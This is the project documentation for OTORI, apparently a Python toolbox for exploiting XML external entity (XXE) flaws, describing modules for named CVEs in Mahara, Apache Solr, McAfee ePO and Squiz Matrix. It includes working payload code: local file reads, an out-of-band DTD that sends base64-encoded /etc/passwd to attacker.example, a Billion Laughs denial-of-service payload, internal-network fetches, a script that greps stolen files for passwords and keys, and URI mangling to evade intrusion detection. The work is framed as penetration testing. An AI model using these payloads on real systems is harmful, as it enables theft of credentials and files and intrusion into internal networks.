XXE Vulnerability Exploitation

[Diagram: Basic XXE attack (McAfee ePO)]

[Diagram: Advanced XXE attack (Mahara)]

Certain versions of McAfee ePolicy Orchestrator are vulnerable to the most straightforward sort of XXE issue. In the first illustration, the attacking system causes an ePO dashboard to be created. Because of the XXE technique, the ePO server inserts the contents of its own db.properties file into the dashboard's description. The attacking system is then able to view the contents of that file by reading the description of the dashboard as displayed in the ePO web interface.
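
To make the mechanics concrete, the payload in this kind of attack is ordinary XML with a DOCTYPE that defines an external entity pointing at a file on the server, plus a reference to that entity in whatever field the application later displays. The following is only a minimal sketch (the element names, file path, and parser settings are illustrative, not the exact ePO request), and whether the entity is actually expanded depends on the XML library version and configuration on the target:

# Hedged sketch of a basic XXE payload of the kind described above, plus a
# parse with lxml configured the way a vulnerable application might be.
# Element names and the file path are illustrative, not the real ePO format.
from lxml import etree

payload = b"""<?xml version="1.0"?>
<!DOCTYPE dashboard [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<dashboard>
  <description>&xxe;</description>
</dashboard>"""

# resolve_entities/load_dtd mirror a permissive configuration; hardened
# parsers (and newer libxml2 builds) refuse to expand the external entity.
parser = etree.XMLParser(resolve_entities=True, load_dtd=True, no_network=False)
doc = etree.fromstring(payload, parser)
print(doc.findtext("description"))  # on a vulnerable setup: the file contents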

The second — much more complicated — series of diagrams illustrates the basic concept described by Timur Yunusov and Alexey Osipov in their whitepaper on out-of-band XXE techniques and the slides from the corresponding BlackHat EU 2013 presentation.

In short, the vulnerable Mahara CMS is tricked into sending the contents of a sensitive file to a malicious webserver acting on behalf of the attacker.

For more technical readers, the out-of-band data is generally base64-encoded — among other things, this allows for binary data to be retrieved.
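
As a rough sketch of how that looks in practice (the hostnames, paths, and parameter name below are hypothetical, and this shows the general shape of the technique rather than the exact payloads OTORI generates): the attacker hosts a DTD that wraps the target file, base64-encoded via PHP's filter wrapper, into a URL pointing back at the attacker's server, and then simply decodes whatever arrives:

# General shape of an attacker-hosted DTD for Yunusov/Osipov-style out-of-band
# exfiltration against a PHP target. The php://filter wrapper base64-encodes
# the stolen file so it survives being embedded in a URL.
import base64

MALICIOUS_DTD = """<!ENTITY % stolen SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % wrapper "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.example/collect?d=%stolen;'>">
%wrapper;
%exfil;
"""

def decode_exfiltrated(query_value):
    # On the attacker side, recovering the file is just a base64 decode of the
    # value that showed up in the collecting web server's logs.
    return base64.b64decode(query_value)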

On The Outside, Reaching In ("OTORI") is a Python-based toolbox intended to allow useful exploitation of XML external entity ("XXE") vulnerabilities.

In the current release, it has two major functions:

  1. Read certain categories of file via the target system (either from the target's filesystem, or via HTTP calls to other systems accessible to the target).
  2. Trigger memory-exhaustion denial-of-service conditions in certain vulnerable targets.

In the future it may be extended to enable similar functionality for the general class of local and remote file-inclusion vulnerabilities. See Future Releases and Planned Features.

Conceptually, it is similar to the Metasploit Framework: it provides a package of related exploits built around a common core, so new exploits of similar types can be developed quickly because much of the code is reusable. The specifics of exploitation are significantly different, however.

XML (External) Entity Vulnerabilities

(This is a brief summary - for a detailed explanation, see OWASP's XML External Entity (XXE) Processing and Microsoft's XML Denial of Service Attacks and Defenses.)

XML (a markup language widely used, especially in so-called "enterprise" software) contains a feature called an "entity", which is basically a placeholder (or, for developers, a constant) that is defined once and then referenced later in the document. For example, if I am writing a boilerplate contract, I can define an entity named &companyname; with the value Spectre Security Products at the beginning of the document, and then use &companyname; wherever the contract would normally contain the actual company name (Spectre Security Products). When I need an identical contract for a different company (Universal Exports), I update the definition of &companyname; at the beginning of the document, and my work is finished.
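
As a minimal, runnable illustration of that example (assuming the lxml library is available; the element names are hypothetical), ordinary internal entities are expanded automatically when the document is parsed:

# Tiny illustration of the &companyname; example: an internal entity defined
# once in the DTD and referenced twice in the body. Element names are made up.
from lxml import etree

contract = b"""<?xml version="1.0"?>
<!DOCTYPE contract [
  <!ENTITY companyname "Spectre Security Products">
]>
<contract>
  <clause>This agreement is between &companyname; and the client.
  &companyname; will deliver the products described below.</clause>
</contract>"""

doc = etree.fromstring(contract)
print(doc.findtext("clause"))  # both references now read "Spectre Security Products"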

This type of entity can be misused in several XML libraries to cause the target system to run out of memory; the specific techniques are frequently known as the "Billion Laughs" and "Quadratic Blowup" attacks. Both of these are described in detail in the OWASP and Microsoft documents. I am generally uninterested in denial-of-service attacks, but included the capability in On The Outside, Reaching In because it was nearly "free" in terms of development effort and may be useful in certain cases.
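
For reference, a scaled-down version of the classic "Billion Laughs" payload looks like the following; a full version uses roughly ten levels of nesting, so that a document of a few kilobytes expands to on the order of a billion copies of the innermost string when the parser resolves the entities:

# Scaled-down sketch of the "Billion Laughs" entity-expansion payload.
# Each entity expands to ten copies of the previous one; extending the chain
# to ten levels yields roughly 10^9 expansions from a tiny document.
BILLION_LAUGHS = """<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<lolz>&lol3;</lolz>"""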

Where XML entities become interesting (in my opinion) is that the specification also defines what is called an "external entity". As the name implies, this is a reference to information stored outside of the XML document. Perhaps the author wants to refer to an image or a table of data maintained by someone else; this extension of the entity concept allows that to happen without copying the information into the new document.

This aspect of the XML specification frequently results in behaviour which is unexpected by the developers using XML libraries, partly because XML has been used for so many types of application in the last 10+ years. Numerous web applications and services receive commands and requests formatted as XML documents. Many of them will internally parse the XML document (which, among other things, usually involves "entity expansion" - replacing the placeholders with the actual value defined for them) and then take action based on the parsed version of the data.

For example, perhaps I have written a web-based document library which allows content to be uploaded in the form of XML files. This library receives the files, resolves any entities, and then stores the result for viewing via web browser. But what if one of the entities is a reference to the external file /etc/shadow, and I have made the mistake of configuring the application to run as the root user? If I (the developer) have not designed my system with security in mind, the browsable version of the document now contains a list of all of the user accounts on the system and their password hashes. The first illustration above is of this type of scenario.
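
A sketch of what that mistake tends to look like in code is shown below, assuming a Python application using lxml (the function and storage here are hypothetical; the point is simply that entity resolution is left enabled while parsing untrusted input):

# Hypothetical sketch of the vulnerable document-library behaviour described
# above: uploaded XML is parsed with entity resolution enabled, and the
# expanded result is stored for later browsing.
from lxml import etree

def store_uploaded_document(xml_bytes, storage, doc_id):
    # Leaving resolve_entities/load_dtd enabled on untrusted input is the mistake.
    parser = etree.XMLParser(resolve_entities=True, load_dtd=True)
    doc = etree.fromstring(xml_bytes, parser)
    # External entities such as file:///etc/shadow have already been expanded
    # by this point, so the stored text now contains their contents.
    storage[doc_id] = etree.tostring(doc, pretty_print=True).decode()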

Nearly every XML library allows for this kind of inclusion of files by exact name. This is still very useful to an attacker, but requires the target file's path to be known or guessed. The Java XML library goes one step further and actually allows directory contents to be listed by the same means, so vulnerable applications written in Java can be used to obtain nearly all of the text-based files from the target system.
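
As an illustration of that difference, the same payload shape with a directory path (note the trailing slash) is typically enough to obtain a file listing from a target built on the standard Java XML parser; the element names here are again hypothetical:

# Payload shape for directory enumeration against Java-based targets: pointing
# the external entity at a directory rather than a file typically returns a
# newline-separated listing of its contents.
DIRECTORY_LISTING_PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///etc/">
]>
<data>&xxe;</data>"""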

This type of vulnerability has been understood since 2002 or earlier, but is still surprisingly common — possibly because of the lack of useful automated tools for exploiting such vulnerabilities.

Some vulnerabilities require much more complicated techniques to exploit. The second illustration above shows the most elaborate method used by the initial release of On The Outside, Reaching In. It involves working together with an instance of She Wore A Mirrored Mask to perform Yunusov-Osipov-style data exfiltration[2].

Practical And Useful XXE Exploitation

Traditionally, XXE exploitation has generally involved single files (the most common example being /etc/passwd as a proof-of-concept of a vulnerability on a Linux or Unix system). While this can be very useful, I believe that realizing the full potential of XXE necessarily involves automation to obtain as many potentially-valuable files from the target system as possible.

In the case of Linux and Unix, the culture of that world is such that administrators will often put sensitive, valuable data in text files protected only by filesystem permissions:

  1. Database credentials and/or connection strings.
  2. SSH private keys.
  3. TLS/SSL certificates and their private keys.
  4. Lists of valid usernames.
  5. Configuration files.
  6. System information (from /proc).
  7. Information about installed software and other components (which may reveal vulnerabilities).

Even if the filesystem permissions are correct (which in my experience is rarely the case), if a PHP-based web application is running as a specific non-privileged account, that account will still almost always have read access to the file containing its own database connection information (including the password).

On The Outside, Reaching In provides the ability to take full advantage of this concept in the form of its --clone mode. Grab all the files you can, and then use grep or your favourite tool to search for information that will reveal further vulnerabilities.
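
For example, once a --clone run has written the recovered files to a local directory (the directory name below is hypothetical), a quick sweep of the kind described above might look like this:

# Rough equivalent of the "grab everything, then grep" workflow: walk the
# local clone directory and flag lines that look like credentials or keys.
import os
import re

INTERESTING = re.compile(r"password|passwd|secret|jdbc:|PRIVATE KEY", re.I)

for dirpath, _dirnames, filenames in os.walk("otori-clone-output"):
    for name in filenames:
        full = os.path.join(dirpath, name)
        try:
            with open(full, "rb") as handle:
                data = handle.read()
        except (IOError, OSError):
            continue
        for lineno, line in enumerate(data.splitlines(), 1):
            text_line = line.decode("latin-1", "replace")
            if INTERESTING.search(text_line):
                print("%s:%d: %s" % (full, lineno, text_line.strip()))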

Because XML external entities are referenced in the form of URIs, the potential exists not only to access content from the target server's filesystem, but also to use that server as a reverse HTTP proxy into the environment that hosts it (as well as into any HTTP-based services running on the target server's loopback address or blocked from direct connectivity by a firewall). In other words, instead of specifying file:///etc/passwd for the external entity, imagine the possibilities of URIs like http://127.0.0.1:8080/servlet/SnoopServlet, https://intranet.local/confidential/blueprints/DeathStar.dwg, or ftp://ftp.local/bank_account_list.txt when those URIs are accessed not by the attacker's system (which hopefully has no network-level access to any of them), but by the exposed server with the XXE vulnerability, which sits on the same (hypothetical) network that those sensitive internal URIs point to.
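
A sketch of the payload shape for that case follows; the only difference from the filesystem examples is the URI scheme, and the internal URI is one of the hypothetical examples from the paragraph above:

# The "reverse proxy" variant: the external entity points at an internal HTTP
# resource, which the vulnerable server fetches on the attacker's behalf.
INTERNAL_FETCH_PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY internal SYSTEM "http://127.0.0.1:8080/servlet/SnoopServlet">
]>
<data>&internal;</data>"""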

On The Outside, Reaching In can access intranet URIs of that type today, as long as the full paths are known. A feature is planned for a future release which would allow it to function as an HTTP proxy for web browsers and other HTTP-based pen-testing tools. This would allow interactive browsing and spidering of that content as well.

Current Modules

The current release of On The Outside, Reaching In includes the following modules:

  • CVE-2012-2239 - Mahara 1.4.x before 1.4.4, and 1.5.x before 1.5.3 (dependent on libxml2 version as well)
    All modules involve pointing an RSS feed-reader object to a malicious RSS feed hosted using She Wore A Mirrored Mask, and exfiltrate data using a Yunusov-Osipov out-of-band technique[2].
    Valid Mahara credentials are required. In most cases, even standard user credentials should be sufficient (in other words, administrative credentials will work, but should not be required).
    Mahara is a PHP-based application, so it is possible to obtain binary files as well as text, although on most systems the maximum file size that can be retrieved is about 2KiB. Larger files will not be returned.
    To my knowledge, On The Outside, Reaching In was the first public source of working exploit code for this vulnerability.
    In early June 2014, libxml2 was updated in a way that prevents this set of modules from working. For example, 2.7.8.dfsg-5.1ubuntu4.6 will allow these modules to function, but 2.7.8.dfsg-5.1ubuntu4.8 will not.
    • CVE-2012-2239-ME - Modify the configuration of an RSS feed-reader on an existing page, then attempt to reset it to its original state once exploitation is complete. (1.4.3 and 1.5.2) [ Module created: 2014-03-22 ]
    • CVE-2012-2239-PC-A - Create a new page (using administrative credentials), and attempt to delete it when exploitation is complete. (1.4.3 only for now) [ Module created: 2014-03-22 ]
    • CVE-2012-2239-PC-U - Create a new page (using standard user credentials), and attempt to delete it when exploitation is complete. (1.4.3 only for now) [ Module created: 2014-03-22 ]

See OTORI - Example 3: Mahara for a detailed tutorial regarding these modules.

  • CVE-2013-6407 - Apache Solr (note: CVE-2013-6408 arguably also applies in some cases)
    Three distinct vulnerabilities are exploited, giving pen-testers maximum flexibility if the system administrator has disabled access to some functionality.
    Valid Solr credentials are not required.
    Solr is a Java-based application, so only ASCII text can be retrieved. In addition, due to the specifics of the vulnerabilities, ASCII text which contains XML/HTML markup cannot be retrieved. There does not appear to be a practical limit on the size of files which can be obtained.
    To my knowledge, On The Outside, Reaching In was the first public source of working exploit code for these vulnerabilities.
    • CVE-2013-6407-DARH - for Solr versions up to and including 4.3.0. Submits a crafted XML document for analysis (not storage), with the XXE-based content being immediately reflected back in the response from the server. This is the fastest Solr-related module, and works with the largest number of versions. This should be the preferred Solr-exploitation module unless the system administrator has disabled access to the Document Analysis Request Handler or it is paramount to avoid leaving error messages in the Solr log files. [ Module created: 2014-02-15 ]
    • CVE-2013-6407-URH-DI - for Solr versions up to and including 4.0.0. Inserts a crafted document into the Solr index, queries Solr to retrieve the document content (which contains the XXE-based data), then attempts to delete that document. This is the slowest Solr-related module. It is the least likely to generate potentially-suspicious error messages in the Solr logs. [ Module created: 2014-02-15 ]
    • CVE-2013-6407-URH-NMVF - for Solr versions up to and including 4.0.0. Attempts to insert a crafted document into the Solr index, but the document is designed to violate a constraint against a particular field containing multiple values. The insert will fail, and the XXE-based content is immediately reflected back in the server response. [ Module created: 2014-02-15 ]

See OTORI - Example 1: Apache Solr for a detailed tutorial regarding these modules.

  • CVE-2014-2205 - McAfee ePolicy Orchestrator 4.6.0 - 4.6.7
    Content retrieved via this vulnerability is subject to two limitations:
    1. The maximum file size which can be retrieved is around 1KiB. Larger files will be truncated, and will contain a chunk of the dashboard definition appended to the actual content.
    2. The first four characters of each file will be replaced with the fifth through eighth characters of the same file.
    This vulnerability was disclosed by RedTeam Pentesting GmbH, and this module uses a method similar to the one in their example code.
    • CVE-2014-2205-D - Uploads a crafted dashboard definition whose Description field contains the XXE exploit, views the dashboard, then attempts to delete it. [ Module created: 2014-05-26 ]

See OTORI - Example 4: McAfee ePO for a detailed tutorial regarding this module, including a walkthrough of how to obtain the ePO database credentials.

  • SOS-12-007 - Squiz Matrix prior to versions 4.6.5/4.8.1 (note: only tested with version 4.6.3)
    All modules involve making crafted requests (requests for an asset map, by default) to the Squiz instance. She Wore A Mirrored Mask is required for all three, because the vulnerability is triggered using a Yunusov-Osipov technique (entities nested via external XML fragment references)[2].
    Valid Squiz Matrix credentials are not required.
    Squiz Matrix is a PHP-based application, so it is possible to obtain binary files as well as text, although on most systems the maximum file size that can be retrieved is about 2KiB. Larger files will not be returned.
    This vulnerability was disclosed by Nadeem Salim from Sense of Security Labs, and this module uses a method similar to the one in Nadeem's example code.
    • SOS-12-007-YU-404 - Makes a request referring to a non-existent page. The XXE-based content is reflected back in the response. [ Module created: 2014-03-16 ]
    • SOS-12-007-YU-IU - Makes a request involving an invalid URI. The XXE-based content is reflected back in the response. [ Module created: 2014-03-16 ]
    • SOS-12-007-YU-OOB - Makes a valid request, with the XXE-based content being exfiltrated using a Yunusov-Osipov out-of-band technique[2]. This is the most reliable and most flexible of the Squiz Matrix modules. The other two are included mainly for tutorial purposes, although they may be able to retrieve slightly larger (a few bytes) files in some edge cases. [ Module created: 2014-03-16 ]

See OTORI - Example 2: Squiz Matrix for a detailed tutorial regarding these modules.

Known Limitations

In the interest of making a potentially-useful tool available sooner rather than later, the current release of On The Outside, Reaching In is a preview which has significant missing functionality compared to the intended "feature-complete" alpha release of the shiny chrome-plated future:

  • Ten working exploits for one commercial product (McAfee ePO 4.6.0 - 4.6.7) and three open-source software packages (Apache Solr, Squiz Matrix, and Mahara) are included. Eventually this number should be far higher.
  • No exploits for systems using Microsoft's XML libraries (SharePoint, etc.) are included (yet). SharePoint itself included a gaping XXE vulnerability up until 2011 (see MS11-074 for details). However, while it's so easy to exploit by hand that even a child could almost do it, trying to automate the process using raw HTTP requests reveals yet another case where beneath its simple-to-use surface, SharePoint is a daunting maze of unexpected complexity.
  • Built-in support for the use of an explicit HTTP proxy is not included. However, you can use tools like proxychains to connect through a proxy. I recommend proxychains-ng / proxychains4, which I have tested successfully for this purpose (specifically, version 4.7).
  • Built-in support for HTTP authentication is not included. If you need to connect to a system configured for HTTP authentication, you can use proxychains-ng / proxychains4 to connect through Burp Suite, and configure Burp Suite to handle platform authentication.
  • While most of the requests sent across the network are designed to be randomized and therefore more difficult for IDS/IPS devices to detect, some of the content (especially more-recently-developed content) is somewhat predictable - in particular, the RSS feed used by the Mahara modules.
  • It has been tested only on Linux (specifically, Debian 7 x64 and Kali Linux 1.0 x64).
  • It has been tested only using Python 2.7.3 (the current default on both test platforms). I briefly tried using it under Python 2.6.5 (the "current" version on my BackTrack 5 VM), and it failed to run due to some of the string-formatting code.
  • It pretends it is capable of HTTP 1.1 requests, but does not support connection re-use.
  • This software has not been tested with IPv6.

In addition, each flavour of XML library as well as the vulnerable software introduces its own limitations on the capabilities of this type of tool.

  • Java-based systems typically allow directories to be enumerated, and the included Apache Solr module allows this to be exploited. Although the filesize for content retrieved via this module is effectively unlimited, only text files with no XML markup can be retrieved due to the XML schema which Solr uses.
  • PHP-based vulnerable systems typically allow binary content to be retrieved (because PHP includes a handy (for attackers) function that base64-encodes such data), but the maximum file size is typically about 4K unless it was built with customized compiler flags.

Why a New Tool?

Initially, I had planned on building this functionality as a set of auxiliary modules for Metasploit. While I am a big fan of Metasploit and use it frequently, I quickly discarded this idea.

Metasploit's core purpose (at least in my mind) is remote code-execution on target systems. While it can do other things, the further away any tool gets from its primary function, the less effective and harder to maintain it will become, in my experience.

Basic XXE exploitation can be done using a client/server model, but many systems (especially PHP-based systems) require the use of techniques like those described by Timur Yunusov and Alexey Osipov[2], where a third system is necessary to "bounce" parts of the exploit and exfiltrated data off of. This could potentially be emulated or approximated using Metasploit, but it would be difficult and probably not make me any friends among Metasploit's developers. For a tool written and used by hackers, Metasploit sure does have a lot of rules regarding contributions.

[Screenshot: Metasploit Wiki, "Guidelines for Accepting Modules and Enhancements", 2014-05-10]

Even if the Metasploit developers welcomed this type of functionality with open arms, having the "co-conspirator" service (in this case, She Wore A Mirrored Mask) decoupled from the main attack tool provides much more flexibility:

Example Attack Configurations

[Diagram: Basic OOB]

[Diagram: Separate Systems]

[Diagram: Master Plan]

A few examples of possible ways to deploy the two components necessary for an out-of-band XXE attack.

Finally, I feel like it's been too long since any significant new general-purpose security tools were released. Maybe everyone is chasing bug bounties instead of showing how individual flaws can be combined to compromise entire organizations?

Why Are You Reinventing The Wheel?

At first glance it might seem like I've reinvented the wheel in some places. Why did I make a new library called libdeceitfulhttp instead of using the standard Python httplib library? Why didn't I borrow mitmproxy so I would have proxy functionality already?

Unfortunately, while httplib is very useful for most Python-based HTTP clients and servers, it has some very significant limitations when it comes to generating and handling traffic that is intended to mimic traffic from other systems as closely as possible, or that intentionally violates the standards in order to reveal or take advantage of security flaws.

The main issue I ran into early on is that httplib rigidly adheres to certain aspects of the protocol and does not provide a way to override that behaviour. A simple example is that not only will it accept only an HTTP version of 1.0 or 1.1, but its creators chose to represent those values as 0 and 1. Want to work with a client that expects something unusual like 0.9, intentionally leave out the version entirely, or see what happens if you send an HTTP -37.7' OR 1=1 OR '12 request to a server? Well, you're out of luck.
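
The usual escape hatch is to drop below httplib entirely and write the request line by hand over a raw socket, which is the kind of low-level control libdeceitfulhttp is meant to package up. A minimal sketch (host, port, and version token are whatever the tester chooses):

# Minimal sketch of the workaround described above: build the request line by
# hand over a raw socket so the "HTTP version" can be any string at all,
# including values httplib would reject outright.
import socket

def send_raw_request(host, port, version_token):
    request = ("GET / HTTP/%s\r\nHost: %s\r\nConnection: close\r\n\r\n"
               % (version_token, host)).encode("latin-1")
    sock = socket.create_connection((host, port), timeout=10)
    try:
        sock.sendall(request)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    finally:
        sock.close()
    return b"".join(chunks)

# e.g. send_raw_request("target.example", 80, "-37.7' OR 1=1 OR '12")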

Presumably in the interest of making the library easier to work with quickly, other design decisions were also made. The set of headers for a request is represented as a hashtable (sorry, "dictionary") indexed by header name. This immediately prevents interesting requests from being sent where the same header name is included multiple times with different values, to see if e.g. one tier within the target environment will interpret the first value, while another will use the second value.

Making things worse (from an accuracy perspective), the hashtable keys are normalized to all-lowercase. This means that if I am writing (for example) an iOS application and a corresponding web API, I can easily detect the presence of a Python-based intermediate system by sending a request header such as X-HaRD-tO-reaD-heADEr: canary and checking whether the server receives that header unchanged, or whether it has been normalized to x-hard-to-read-header: canary, X-Hard-To-Read-Header: canary, etc.

mitmproxy seems like a very well-written piece of software, but as far as I can tell it is based on httplib, and so brings those limitations along.

The next major hurdle to overcome for On The Outside, Reaching In and She Wore A Mirrored Mask is to rebuild libdeceitfulhttp as a 1:1 replacement for httplib, in which the two main differences are that every parameter is a string (allowing for maximum, dangerous flexibility), and that the headers are represented as a list of tuples with some utility functions to handle accessing them by name.
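
A rough sketch of that header representation (not the actual libdeceitfulhttp API, just the idea of an ordered list of tuples plus a lookup helper) might look like this:

# Sketch of headers as an ordered list of (name, value) tuples: duplicates and
# exact casing are preserved, and lookups by name are handled by a helper.
class HeaderList(object):
    def __init__(self):
        self.items = []

    def add(self, name, value):
        self.items.append((name, value))

    def get_all(self, name):
        # Case-insensitive lookup for convenience; stored casing is untouched.
        return [v for (n, v) in self.items if n.lower() == name.lower()]

headers = HeaderList()
headers.add("X-HaRD-tO-reaD-heADEr", "canary")
headers.add("X-Forwarded-For", "10.0.0.1")
headers.add("X-Forwarded-For", "192.168.1.1")  # duplicate names are allowed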

Future Releases and Planned Features

Some of the things I'd like to include in future releases (not in any particular order):

  • Completely replace the use of httplib with the pen-testing-friendly equivalent discussed above.
  • Automatically launch a basic SWAMM instance to streamline the most common use of that tool.
  • URI-specific basic IDS/IPS signature evasion. For example, if the current URI to be requested is file:///etc/shadow, then randomly transform it into something like file:///etc/default/../shadow, file:///var/tmp/../log/../etc/default/../shadow, or file:///var/tmp/%2e%2e/log/%2e.%2fetc/default%2f2e./%73%68%61%64%6f%77 (see the sketch after this list).
  • The optional ability to specify module options using name/value pairs instead of the current position-based system.
  • Variable support for URI lists (e.g. a list of the contents of a typical Apache Tomcat directory structure is provided, each entry begins with file:///%BASEPATH%/, and the value for that variable is specified at runtime so the user doesn't have to generate their own list file every time).
  • Filtered view of modules based on search or other criteria (e.g. what functionality the module supports).
  • Separate groupings of modules for mainline, community-contributed, and user-developed (to avoid stomping on users' files when they upgrade).
  • An option to profile the target (attempt to determine the OS, system specs, etc.).
  • Correct HTTP 1.1 operation (pipelining, etc.).
  • Native proxy support.
  • Authentication (NTLM, Kerberos, etc.) for both webservers and proxies.
  • Fix the --noemptydirs option so that it works as expected in --exacturilist mode.
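
As a purely illustrative sketch of the URI-mangling idea mentioned in the evasion bullet above (not the planned OTORI implementation): pad the path with redundant dot segments and percent-encode a few characters so the URI no longer matches a literal file:///etc/shadow signature, while resolvers that normalize dot segments and percent-encoding still end up at the same file:

# Illustrative URI mangling: harmless "./" segments plus sporadic
# percent-encoding. Whether a given XML library decodes these in file:// URIs
# varies, so real evasion logic would need to be target-aware.
import random

def mangle_file_uri(path):
    out = []
    for ch in path:
        if ch == "/":
            out.append("/" + "./" * random.randint(0, 2))
        elif ch.isalpha() and random.random() < 0.3:
            out.append("%%%02x" % ord(ch))
        else:
            out.append(ch)
    return "file://" + "".join(out)

print(mangle_file_uri("/etc/shadow"))  # e.g. file:///././etc/%73had%6fw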
